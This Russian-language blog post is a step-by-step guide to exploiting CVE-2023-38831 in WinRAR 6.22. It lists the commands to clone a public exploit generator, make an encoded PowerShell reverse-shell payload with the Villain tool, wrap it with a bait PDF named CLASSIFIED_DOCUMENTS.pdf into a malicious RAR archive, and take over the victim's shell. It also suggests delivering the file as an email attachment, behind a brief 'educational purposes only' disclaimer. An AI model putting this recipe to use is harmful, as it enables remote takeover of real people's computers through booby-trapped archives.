Использование уязвимости версии WinRAR 6.22

В мире кибербезопасности появилась новая угроза: CVE-2023–38831, уязвимость удаленного выполнения кода (RCE), нацеленная на WinRAR 6.22, подвергающая пользователей и организации потенциальному риску несанкционированного доступа и утечки данных.

Ссылка

CVE-2023–38831: https://nvd.nist.gov/vuln/detail/CVE-2023-38831

Эксплойт: https://github.com/b1tg/CVE-2023-38831-winrar-exploit

Установка:

Для начала клонируем репозиторий с помощью команды git clone:

git clone https://github.com/b1tg/CVE-2023-38831-winrar-exploit
cd CVE-2023-38831-winrar-exploit

В этом сценарии у нас есть файл script.bat, который служит полезной нагрузкой и включает в себя закодированную обратную оболочку, полученную с помощью инструмента Villain, но в качестве альтернативы вы также можете использовать исполняемые файлы обратной оболочки MSF для той же цели.

Использование:

  1. Поместите файл-приманку и файл (злого) сценария в текущий каталог. Рекомендуется, чтобы файл-приманка был изображением (.png, jpg) или документом (.pdf).
  2. Запустите python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>, чтобы сгенерировать свой эксплойт.

Обратное создание оболочки:

Для создания полезной нагрузки я использовал инструмент Villian для кодирования и создания вредоносной полезной нагрузки.

Вы можете легко установить Villian, запустив

apt install villian

Для быстрой установки через APT или альтернативно вы можете получить его непосредственно из репозитория GitHub.

Чтобы создать полезную нагрузку, вы можете использовать команду:

generate payload=windows/netcat/powershell_reverse_tcp lhost=eth0 encode

Мы успешно создали нашу полезную нагрузку. Теперь давайте изменим файл script.bat, чтобы заменить «calc.exe» сгенерированной полезной нагрузкой, как показано ниже.

Когда все подготовлено, приступим к генерации нашего эксплойта с помощью генератора.

python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat  exploit.rar

Мы успешно создали наш эксплойт. В данном случае я провожу проверку концепции (POC) этой уязвимости. Я использовал VirtualBox для передачи эксплойта через HTTP-сервер Python и «certutil». В реальном мире хакерства у вас есть различные варианты отправки эксплойта в виде вложения по вашему усмотрению. Важно отметить, что это только в образовательных целях.

Отлично, все шаги выполнены. Теперь давайте дождемся выполнения полезной нагрузки и оставим инструмент Villian включенным, не закрывая его.

После открытия файла «exploit.rar» и PDF запускается бэкдор, и инструмент Villian предупредит, когда соединение будет установлено. Чтобы получить доступ к оболочке, вы можете выполнить следующие команды.

sessions
shell <session_id>

Кроме того, для ясности я включил видеодоказательство в качестве вложения в этот пост в блоге.



СЛЕДИТЕ ЗА БОЛЬШЕ {POC